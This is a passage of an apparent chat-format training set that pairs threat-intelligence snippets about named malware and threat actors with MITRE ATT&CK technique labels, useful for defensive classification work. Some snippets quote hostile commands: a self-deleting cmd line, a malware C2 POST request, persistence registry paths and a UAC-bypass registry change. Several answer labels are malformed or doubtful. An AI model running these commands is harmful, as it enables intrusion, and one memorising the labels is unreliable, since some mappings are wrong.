- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The function will take another executable embedded in the initial Trojan as a resource named “M”, which it attempts to inject into the following process to execute: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe While it’s configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as well: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe Embedded injector Trojan The R payload discussed above is nothing more than an injector Trojan, which accepts a path to an executable and a buffer of code to inject into the process as arguments"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing', 'T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After successfully exporting mail they wished to steal, the attacker would remove the evidence of the export request using Remove-MailboxExportRequest"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Apart from being a flexible and easy-to-use scripting language, BLADABINDI’s use of AutoIt is notable. It uses AutoIt (the FileInstall command) to compile the payload and the main script into a single executable, which can make the payload — the backdoor — difficult to detect"
- },
- {
- "role": "assistant",
- "content": "T1027.004 - Obfuscated Files or Information: Compile After Delivery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to download a file to the system from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The entire command structure gets compressed with zlib and then encrypted using a custom stream cipher."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mis-Type may create a file containing the results of the command \"cmd.exe /c ipconfig /all\"."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability, however in late January 2018 when, paradoxically, newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper can recursively wipe folders and files in `Windows`, `Program Files`, `Program Files(x86)`, `PerfLogs`, `Boot, System`, `Volume Information`, and `AppData` folders using `FSCTL_MOVE_FILE`. HermeticWiper can also overwrite symbolic links and big files in `My Documents` and on the Desktop with random bytes."
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer can use the tokens of users to create processes on infected systems."
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Netwalker DLL has been injected reflectively into the memory of a legitimate running process."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials. Seedworm uses off-the-shelf, unmodified versions of these tools as well as custom-compiled variants which we have determined are only used by this group"
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy enumerates information about connected storage devices."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If any of the above files or directories exist, the Windows executable throws an exception and exits. This indicates Redaman checks if it is running in a sandbox or similar type of analysis environment."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShower sets up persistence with a Registry run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This document exploited a newer vulnerability, CVE-2017-0199"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ProLock can use WMIC to execute scripts on targeted hosts."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates over HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon can collect and send OS version and computer name as a part of its C2 beacon."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "cmd.exe /C choice /C Y /N /D Y /T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin. It then moves itself to %APPDATA%\\Windows\\WindowsImplantment.exe and sets both of these files to have the hidden and system flags to hide them from the user. With the Trojan moved its final location, it will then create a scheduled task to run a VBScript to make sure it runs persistently. This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task. This process ultimately attempts to run the Trojan every three minutes, which is important as OopsIE relies on this scheduled task as it does not include a main loop to continue its execution. After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The process in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we discussed in our previous blog. Also, the oops string used to signify and erroneous transmission from the C2, which gave OopsIE its name is reversed to spoo. hex(STDOUT of whoami command)> If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL. The command handler in this OopsIE variant is very similar to the previous version, as it contains the same three (1, 2 and 3) commands seen in Table 2"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear can receive and load executables from remote C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to copy files to a remotely connected system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can add itself to the `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` and `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UIF2IS20VK` Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hi-Zor creates a Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}\" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis. We captured the commands we ran in Invoke-Obfuscation in the animation in Figure 3 below, which visualizes the steps the threat actor may have taken to create the payload delivered in this attack"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Confucius has downloaded additional files and payloads onto a compromised host following initial access."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware will setup the miner and then the miner will persist it in the system in two ways: 1) by adding itself as a service if the malware gains admin privileges or 2) by adding the batch file to the startup folder"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has masqueraded as Windows system file names, as well as \"chkntfs.exe\" and \"syscron.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers dropped Visual Basic and PowerShell scripts in folders that they created under the ProgramData (a hidden folder, by default). The attackers created persistence using Windows’ registry, services and scheduled tasks. This persistence mechanism ensured that the loader scripts would execute either at startup or at predetermined intervals"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability CVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After Tor is up and running, Siloscape uses it to connect to its C2 – an IRC server, using an onion address that was provided as a command line argument"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In other cases, threat actors placed web shells on externally accessible servers, sometimes behind a reverse proxy, to execute commands on the compromised system"
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy', 'T1059 - Command and Scripting Interpreter', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used WinSCP to exfiltrate data from a targeted organization over FTP."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (NDST.DIT) for credential dumping."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory', 'T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used the command `net view /all time` to gather the local time of a compromised network."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In total Unit 42 has seen over 50 versions of these weaponized documents spanning from late October through to March. We’ve used these to lay out a timeline, which will be referenced throughout the remainder of this blog, of the milestones of evolution that provides some insight into why the changes are made. Note: This figure does not cover all versions seen but simply milestone changes. It does however start with the first version created on October 23rd, last saved 25th October and first seen by our Wildfire cloud sandbox 26th October."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For instance, here are the resulting decrypted strings from each of the case statements (dd7e69e1…): Case – String decrypted 1 – 185.25.50[.]93 2 – POST http://185.25.50[.]93/syshelp/kd8812u/protocol.php HTTP/1.1\\r\\nHost: 185.25.50[.]93\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: 3 – porg= 4 – Content-Length: The Trojan uses raw sockets to communicate with its C2 server and uses the decrypted string above to create HTTP requests"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1140 - Deobfuscate/Decode Files or Information', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LOWBALL uses the Dropbox cloud storage service for command and control."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy to 1."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "First, the malware goes over the files and directories from the paths_to_wipe config, fills them with zero-bytes instead of their real content, and then deletes them"
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IndigoZebra has compromised legitimate email accounts to use in their spearphishing operations."
- },
- {
- "role": "assistant",
- "content": "T1586.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker has obfuscated its code to prevent its removal from host machines."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The persistence is done during the first execution of the malware using a well-known technique, the “Logon scripts”. It creates a script file registration.bat and writes several strings from the TForm1 object. The final script is"
- },
- {
- "role": "assistant",
- "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ISMAgent prioritizes HTTP as its mechanism to communicate with the C2 server, but if it is unable to reach the C2 server it will switch to the DNS tunneling mechanism. To carry out its HTTP C2 communications, the Trojan prepends \"www. to the configured C2 domain and issues a DNS query to resolve this domain"
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Strider has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to acquire credentials any time a domain, local user, or administrator logs in or changes a password."
- },
- {
- "role": "assistant",
- "content": "T1556.002 - Modify Authentication Process: Password Filter DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hancitor has been delivered via phishing emails with malicious attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN's installer/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "S-Type can download additional files onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has the ability to download additional payloads from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic uses the \"net view\" command on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat actor can craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features, which rely on MOTW tagging – for example, ‘Protected View’ in Microsoft Office. This zero-day has a moderate CVSS risk score of 5.4, because it only helps to avoid the Microsoft Defender SmartScreen defense mechanism, which has no RCE or DoS functionality."
- },
- {
- "role": "assistant",
- "content": "T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi achieves persistence using Userinit by adding the Registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"."
- },
- {
- "role": "assistant",
- "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA uses the \"net user\" command."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since then, the threat actors have expanded delivery to include malicious spam campaigns, RDP attacks, and other attack vectors. In other reports, threat actors breached at least three managed service providers (MSPs) and used the access to deploy REvil to the MSPs' customers"
- },
- {
- "role": "assistant",
- "content": "T1566 - Phishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This specific key is set to point towards the path of the previously copied Cardinal RAT executable path. The executable will periodically query this registry key to ensure it is set appropriately. If the executable finds the registry key has been deleted, it will re-set it. The Load registry key acts as a persistence mechanism, ensuring that this Cardinal RAT executes every time a user logs on. More information about the Load registry key may be found here"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "launches a shell to execute commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has obtained tools such as AD Explorer inspection software for their operations."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has used PowerShell for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware (example in Figure 6"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then it uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12, if a command is available. It writes the command results in another OneDrive subfolder and encrypts it with the XOR key 0xAA"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
